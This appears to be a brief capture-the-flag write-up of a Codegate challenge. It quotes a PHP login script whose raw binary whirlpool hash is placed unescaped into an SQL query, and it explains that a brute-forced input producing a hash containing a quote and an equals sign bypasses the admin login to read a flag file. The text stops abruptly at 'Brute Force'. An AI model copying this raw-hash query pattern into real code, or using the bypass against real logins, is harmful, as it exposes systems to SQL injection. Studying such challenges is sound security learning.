$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);
if (isset($row['user_id'])) {
if ($row['user_id'] == "admin") {
echo "hello, admin
";
die(file_get_contents($flag));
} else {
die("hello, ".$row['user_id']);
}
} else {
msg("login failed..");
}
The issue with code is that hash() function which outputs raw binary data leading to SQL injection.
string hash ( string $algo , string $data [, bool $raw_output = false ] )
raw_input:
When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.
To bypass the login, we need to find a value that when hashed with whirlpool results in string containing '='Brute Force
